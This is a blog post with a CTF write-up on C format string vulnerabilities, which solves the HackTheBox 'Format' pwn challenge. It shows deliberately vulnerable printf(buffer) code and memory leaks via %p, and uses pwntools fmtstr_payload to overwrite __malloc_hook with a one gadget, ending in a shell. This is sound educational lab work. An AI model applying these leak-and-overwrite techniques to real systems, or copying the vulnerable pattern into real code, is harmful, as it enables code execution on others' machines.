<!DOCTYPE html>
<html lang="en-us">
<title>Format string: A Mini Study - with challenge | </title>
<meta charset="utf-8">
<meta name="generator" content="Hugo 0.80.0" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://cavetownie.github.io/css/index.css">
<link rel="canonical" href="https://cavetownie.github.io/posts/htb_format/">
<link rel="alternate" type="application/rss+xml" href="" title="">

<header>
  
    <a href="https://cavetownie.github.io/" class="title"></a>
  
  
    <nav>
    
      <a href="/">Blog</a>
    
      <a href="/about/">About</a>
    
      <a href="/challenges/">Challenges</a>
    
      <a href="/index.xml">RSS</a>
    
    </nav>
  
</header>

<article>
  <header>
    <h1>Format string: A Mini Study - with challenge</h1>
    <time datetime="2021-09-08T15:33:45&#43;02:00">September 08, 2021</time>
  </header>
  <h1 id="format-string-a-mini-study---with-challenge">Format string: A Mini Study - with challenge</h1>
<p>This will be a short, and practical walkthrough of the concept &ldquo;format string&rdquo;, with an example of how to solve a format string challenge.</p>
<h1 id="research-and-everything-format-string">Research and everything format string</h1>
<p>Format is a pwn task on HackTheBox revolving around the idea of format strings (eg. %s, %d, %p), which is a C feature, that allows a strings to contain both words and variables in one. Like such:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">int</span> hack_number <span style="color:#f92672">=</span> <span style="color:#ae81ff">1337</span>;

<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(){
    printf(<span style="color:#e6db74">&#34;Number is: %d</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, hack_number);
}
</code></pre></div><p>This means that a string if printed and contains one of these it will print whatever the format specifies. There&rsquo;s a wide variety of specifiers programmers can use for this some would be:</p>
<pre><code>%c - looks at an address and prints the char (reads one byte)
%s - looks at an address and prints the string (reads till null byte)
%d - looks at an address and prints the integer
%p - prints an address
%f - prints a float
</code></pre><p>Now while this might not currently seem like a security vulnerability it most definitely can become one. A common error is that a C programmer, trusts to receive a string from a user, and simply print it. This could be to receive a username, and print said username:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;unistd.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(){
    <span style="color:#66d9ef">char</span> buffer[<span style="color:#ae81ff">20</span>];    
    read(<span style="color:#ae81ff">0</span>, buffer, <span style="color:#ae81ff">20</span>); <span style="color:#75715e">//Reads from standard input to buffer, 20 bytes
</span><span style="color:#75715e"></span>
    printf(buffer); <span style="color:#75715e">//Prints whatever lies at the address of buffer
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
}
</code></pre></div><p>Compiling the program with gcc and run it, try to send %p %p %p from stdin:</p>
<pre><code>cave@townie:$ ./a.out 
%p %p %p %p
0x7fff5b31d0e0 0x14 0x7f695e945b82 (nil)
</code></pre><p>As one can see, we get a bunch of addresses. The weird thing is, that we never read any addresses into &ldquo;buffer&rdquo;, so where are these addresses from? We are leaking values now! This is not very good, and if this is a possibility one should be very wary of the possibilities.</p>
<p>Imagine the following print statement:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c">printf(<span style="color:#e6db74">&#34;num1: %d, num2: %d, num3: %d, str1: %s&#34;</span>, num1, num2, num3, str1);
</code></pre></div><p>Let&rsquo;s quickly remember now, that printf is a function from libc, and we feed it the arguments of &ldquo;num1, num2, num3, str1&rdquo;. We remember that everytime we use a function, and give it variables, these are passed on the stack. Now it makes sense why &ldquo;%p %p %p %p&rdquo;, gives us addresses from memory!</p>
<p>Now %s, looks at an address, and prints the value there&hellip; Cool&hellip; and we know that segfaults are caused by a program trying to read or write from or to an illegal memory location. What would happen if we sent a lot of &ldquo;%s %s &hellip;&rdquo;, it would segfault!
<!-- raw HTML omitted -->
<!-- raw HTML omitted -->
There&rsquo;s also something called &ldquo;Direct Parameter Access&rdquo;, which essentially states, that we can read anywhere, if we know the offset from where we are. That looks like this:</p>
<pre><code>%[offset]$[type]
(eg. %4$s, %5$s, %1$s, %1337$s
</code></pre><p>Last but not least, format string is turing complete, which means that we can execute any calculation with it (might not be fast tho) - this leads to being able to read AND write to any point in memory, if we have a format string, and can leak memory properly, we can control overwrite everything we&rsquo;re allowed to. This can be done by the specifier &ldquo;%n&rdquo;.<!-- raw HTML omitted --><!-- raw HTML omitted -->
But how does &ldquo;%n&rdquo; work? It prints nothing, and reads the characters printed before it, into an address (or rather to a pointer of a signed int):</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>()
{
  <span style="color:#66d9ef">int</span> val;

  printf(<span style="color:#e6db74">&#34;blah %n blah</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, <span style="color:#f92672">&amp;</span>val);
  printf(<span style="color:#e6db74">&#34;val = %d</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, val);
}

Output <span style="color:#f92672">&gt;&gt;</span> val <span style="color:#f92672">=</span> <span style="color:#ae81ff">5</span>
</code></pre></div><p>We wont go too much into the details exactly of making a format string payload manually, because our beloved pwntools &lt;3, has this exact feature:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">Python <span style="color:#ae81ff">3.9</span><span style="color:#f92672">.</span><span style="color:#ae81ff">5</span> (default, May <span style="color:#ae81ff">11</span> <span style="color:#ae81ff">2021</span>, <span style="color:#ae81ff">08</span>:<span style="color:#ae81ff">20</span>:<span style="color:#ae81ff">37</span>) 
[GCC <span style="color:#ae81ff">10.3</span><span style="color:#f92672">.</span><span style="color:#ae81ff">0</span>] on linux
Type <span style="color:#e6db74">&#34;help&#34;</span>, <span style="color:#e6db74">&#34;copyright&#34;</span>, <span style="color:#e6db74">&#34;credits&#34;</span> <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;license&#34;</span> <span style="color:#66d9ef">for</span> more information<span style="color:#f92672">.</span>
<span style="color:#f92672">&gt;&gt;&gt;</span> <span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
<span style="color:#f92672">&gt;&gt;&gt;</span> context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;amd64&#34;</span>
<span style="color:#f92672">&gt;&gt;&gt;</span> fmtstr_payload(<span style="color:#ae81ff">1</span>, {<span style="color:#ae81ff">0xdeadbeef</span>: <span style="color:#ae81ff">0xcafebabe</span>})
<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">%190c</span><span style="color:#e6db74">%7$lln</span><span style="color:#e6db74">%12c</span><span style="color:#e6db74">%8$hhn</span><span style="color:#e6db74">%52c</span><span style="color:#e6db74">%9$hhn</span><span style="color:#e6db74">%188c</span><span style="color:#e6db74">%10$hhnaaaab</span><span style="color:#ae81ff">\xef\xbe\xad\xde\x00\x00\x00\x00\xf2\xbe\xad\xde\x00\x00\x00\x00\xf1\xbe\xad\xde\x00\x00\x00\x00\xf0\xbe\xad\xde\x00\x00\x00\x00</span><span style="color:#e6db74">&#39;</span>
</code></pre></div><h1 id="the-challenge---recon">The challenge - recon</h1>
<p>Let&rsquo;s start by quickly looking at the binaries security using checksec:</p>
<pre><code>cave@townie:~/CTF/pwn/format_$ checksec format
[*] '/home/cave/CTF/pwn/format_/format'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
</code></pre><p>Everything is on. Full RELRO means we cannot overwrite the global offset table. PIE meaning we have to leak the binary base somehow to find anything. Cool:)</p>
<p>Opening in ida, we see only one function being called during main, which is the echo function.
<img src="https://cavetownie.github.io/pictures/IDA.png" alt="Echo function"></p>
<p>The echo function just reads from stdin into a buffer, and prints that buffer without any sanity checks - this means we have a format string vulnerability.</p>
<h1 id="game-plan">Game plan</h1>
<p>Now that we know we have a format string vulnerability, we need to find out how to use it. But as we&rsquo;re in an infinite loop, with no ways of overwriting the global offset table, what do we overwrite?</p>
<p>There are two targets that&rsquo;s specially interesting.</p>
<ol>
<li>Overwrite the return address of printf (on the stack)</li>
<li>Overwrite what lies at &ldquo;malloc hook&rdquo;, and then send a lot of characters so malloc will be called to allocate memory</li>
</ol>
<p>What would we need to do each of these plans?</p>
<ol>
<li>We would need to leak a stack address, then find the offset between the return of printf, and the leaked address.<!-- raw HTML omitted -->After that we would need to leak the libc version, so that we could put a one gadget as the printf return.</li>
<li>We would need to leak the libc address, and overwrite malloc hook with a one gadget</li>
</ol>
<p>Now while both are definitely viable, the easier one would be to overwrite malloc hook.</p>
<p>Let&rsquo;s start by running the binary and look at the pointers we can leak:</p>
<pre><code>cave@townie:~/CTF/pwn/format_$ ./format 
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p 
0x7f28befdfa23 (nil) 0x7f28bef06b82 0x7ffc6df46b50 (nil) 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x20702520702520 (nil) 0xa8716b068a2d4d00 0x7ffc6df46c80 0x558aecf6c2b3 0x7ffc6df46d70 0xa8716b068a2d4d00 (nil) 0x7f28bee27565 0x7ffc6df46d78 0x16dfe8000 0x558aecf6c284 0x7ffc6df47059 0x558aecf6c2d0 0x6abbc2b8a3ffaee0 0x558aecf6c0c0 (nil) (nil) (nil) 0x954319507adfaee0 0x94eabf7c49cbaee0 (nil) (nil) (nil) 0x1 0x7ffc6df46d78 0x7ffc6df46d88 0x7f28bf036220 (nil) (nil) 0x558aecf6c0c0 0x7ffc6df46d70 (nil) (nil) 0x558aecf6c0ee 0x7ffc6df46d68 0x1c 0x1 0x7ffc6df4732a (nil) 0x7ffc6df47333 0x7ffc6df47343 0x7ffc6df47395 0x7ffc6df473a8 0x7ffc6df473bc 0x7ffc6df473eb 0x7ffc6df47425 0x7ffc6df47446 0x7ffc6df47472 0x7f28befdfa23 (nil) 0x7f28bef06b82 0x7ffc6df46b50 (nil) 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520000a20 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 
</code></pre><p>Now let&rsquo;s quickly open in gdb and run &ldquo;vmmap&rdquo;, to see which addresses look like code and which looks like stack:</p>
<pre><code>    0x555555554000     0x555555555000 r--p     1000 0      /home/cave/CTF/HTB/pwn/format_/format
    0x555555555000     0x555555556000 r-xp     1000 1000   /home/cave/CTF/HTB/pwn/format_/format
    0x555555556000     0x555555557000 r--p     1000 2000   /home/cave/CTF/HTB/pwn/format_/format
    0x555555557000     0x555555558000 r--p     1000 2000   /home/cave/CTF/HTB/pwn/format_/format
    0x555555558000     0x555555559000 rw-p     1000 3000   /home/cave/CTF/HTB/pwn/format_/format
    0x7ffff7dbf000     0x7ffff7dc1000 rw-p     2000 0      anon_7ffff7dbf
    0x7ffff7dc1000     0x7ffff7de7000 r--p    26000 0      /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7ffff7de7000     0x7ffff7f52000 r-xp   16b000 26000  /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7ffff7f52000     0x7ffff7f9e000 r--p    4c000 191000 /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7ffff7f9e000     0x7ffff7fa1000 r--p     3000 1dc000 /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7ffff7fa1000     0x7ffff7fa4000 rw-p     3000 1df000 /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7ffff7fa4000     0x7ffff7faf000 rw-p     b000 0      anon_7ffff7fa4
    0x7ffff7fc3000     0x7ffff7fc7000 r--p     4000 0      [vvar]
    0x7ffff7fc7000     0x7ffff7fc9000 r-xp     2000 0      [vdso]
    0x7ffff7fc9000     0x7ffff7fca000 r--p     1000 0      /usr/lib/x86_64-linux-gnu/ld-2.33.so
    0x7ffff7fca000     0x7ffff7ff1000 r-xp    27000 1000   /usr/lib/x86_64-linux-gnu/ld-2.33.so
    0x7ffff7ff1000     0x7ffff7ffb000 r--p     a000 28000  /usr/lib/x86_64-linux-gnu/ld-2.33.so
    0x7ffff7ffb000     0x7ffff7ffd000 r--p     2000 31000  /usr/lib/x86_64-linux-gnu/ld-2.33.so
    0x7ffff7ffd000     0x7ffff7fff000 rw-p     2000 33000  /usr/lib/x86_64-linux-gnu/ld-2.33.so
    0x7ffffffde000     0x7ffffffff000 rw-p    21000 0      [stack]

</code></pre><p>So addresses with 0x7fff are stack addresses, and 0x555 addresses are code. We can see the following addresses, we see three addresses that looks like code. Let&rsquo;s pick one and look in gdb</p>
<pre><code>0x558aecf6c284 0x7ffc6df47059 0x558aecf6c2d0 0x6abbc2b8a3ffaee0 0x558aecf6c0c0 (nil) (nil) (nil)
</code></pre><p>So one of the addresses is at the offset 35, meaning we can access it with direct parameter accessing: %35$p (this is on remote, 34 on local for some reason) - if we look in gdb we see that the address is:</p>
<pre><code>pwndbg&gt; x/32wgx 0x5555555550c0
0x5555555550c0 &lt;_start&gt;:	0x8949ed31fa1e0ff3	0xe48348e289485ed1
0x5555555550d0 &lt;_start+16&gt;:	0x0266058d4c5450f0	0x0001ef0d8d480000
</code></pre><p>Now we just find the offset between the start and the code section, and bob&rsquo;s your uncle, we have the offset for the base address leaked.</p>
<p>Now next we need to leak the global offset table&rsquo;s entry for printf - we remember that %s, reads from an address and prints that, so we read from the address of the global offset table and we have leaked libc base+printf offset. We can test which parameter access we need to use manually:</p>
<pre><code>cave@townie:~/CTF/pwn/format_$ ./format
aaaabbbb %8$p i AAAAAAAA
aaaabbbb 0x4141414141414141 i AAAAAAAA
</code></pre><p>Now we use this info to leak printf (We put the address of prints GOT entry instead of the 8 capital A&rsquo;s) - after that we use a libc database to find out which libc is running remotely. Last but not least, we need to make the actual write with format string.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">payload <span style="color:#f92672">=</span> fmtstr_payload(<span style="color:#ae81ff">6</span>, {__malloc_hook: one_gd})
</code></pre></div><p>I&rsquo;m not completely sure why it has to be 6, but it&rsquo;s something about you controlling that parameter:</p>
<pre><code>AAAAiiii %6$p
AAAAiiii 0x6969696941414141
</code></pre><p>And then we just send it! And send a ton of characters to call malloc to get space for them, and boom:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python3" data-lang="python3">[<span style="color:#f92672">*</span>] <span style="color:#e6db74">&#39;/home/cave/CTF/pwn/format_/solve1_malloc_hook/format&#39;</span>
    Arch:     amd64<span style="color:#f92672">-</span><span style="color:#ae81ff">64</span><span style="color:#f92672">-</span>little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[<span style="color:#f92672">+</span>] Opening connection to challenge on port <span style="color:#ae81ff">80085</span>: Done
[<span style="color:#f92672">+</span>] Start: <span style="color:#ae81ff">0x55661cfd20c0</span>
[<span style="color:#f92672">*</span>] Base: <span style="color:#ae81ff">0x55661cfd1000</span>
printf got <span style="color:#ae81ff">0x55661cfd4fc0</span>
[<span style="color:#f92672">-</span>] Leaked printf got: <span style="color:#ae81ff">0x7fe98b203e80</span>
[<span style="color:#f92672">-</span>] Leaked libc: <span style="color:#ae81ff">0x7fe98b19f000</span>
<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">%140c</span><span style="color:#e6db74">%15$lln</span><span style="color:#e6db74">%c</span><span style="color:#e6db74">16$hhn</span><span style="color:#e6db74">%86c</span><span style="color:#e6db74">%17$hhn%618$hhn</span><span style="color:#e6db74">%85c</span><span style="color:#e6db74">%19$hhn</span><span style="color:#e6db74">%12c</span><span style="color:#e6db74">%20$hhnaaaaba0</span><span style="color:#ae81ff">\xac</span><span style="color:#e6db74">X</span><span style="color:#ae81ff">\x8b\xe9\x7f\x00\x00</span><span style="color:#e6db74">1</span><span style="color:#ae81ff">\xac</span><span style="color:#e6db74">X</span><span style="color:#ae81ff">\x8b\xe9\x7f\x00\x00</span><span style="color:#e6db74">4</span><span style="color:#ae81ff">\xac</span><span style="color:#e6db74">X</span><span style="color:#ae81ff">\x8b\xe9\x7f\x00\x00</span><span style="color:#e6db74">2</span><span style="color:#ae81ff">\xac</span><span style="color:#e6db74">X</span><span style="color:#ae81ff">\x8b\xe9\x7f\x00\x00</span><span style="color:#e6db74">5</span><span style="color:#ae81ff">\xac</span><span style="color:#e6db74">X</span><span style="color:#ae81ff">\x8b\xe9\x7f\x00\x00</span><span style="color:#e6db74">3</span><span style="color:#ae81ff">\xac</span><span style="color:#e6db74">X</span><span style="color:#ae81ff">\x8b\xe9\x7f\x00\x00</span><span style="color:#e6db74">&#39;</span>
<span style="color:#f92672">/</span>home<span style="color:#f92672">/</span>cave<span style="color:#f92672">/</span>CTF<span style="color:#f92672">/</span>pwn<span style="color:#f92672">/</span>format_<span style="color:#f92672">/</span>solve1_malloc_hook<span style="color:#f92672">/</span>sol<span style="color:#f92672">.</span>py:<span style="color:#ae81ff">92</span>: <span style="color:#a6e22e">BytesWarning</span>: Text <span style="color:#f92672">is</span> <span style="color:#f92672">not</span> bytes; assuming ASCII, no guarantees<span style="color:#f92672">.</span> See https:<span style="color:#f92672">//</span>docs<span style="color:#f92672">.</span>pwntools<span style="color:#f92672">.</span>com<span style="color:#f92672">/</span><span style="color:#75715e">#bytes</span>
  io<span style="color:#f92672">.</span>sendline(payload)
[<span style="color:#f92672">*</span>] Switching to interactive mode
                                                                                                                                           p      \xd0                                                                                     \x81                                                                \xc0                                                                                    \xc0           <span style="color:#f92672">%</span>aaaaba0ls
flag<span style="color:#f92672">.</span>txt
format
run_challenge<span style="color:#f92672">.</span>sh
</code></pre></div>
</article>



</html>
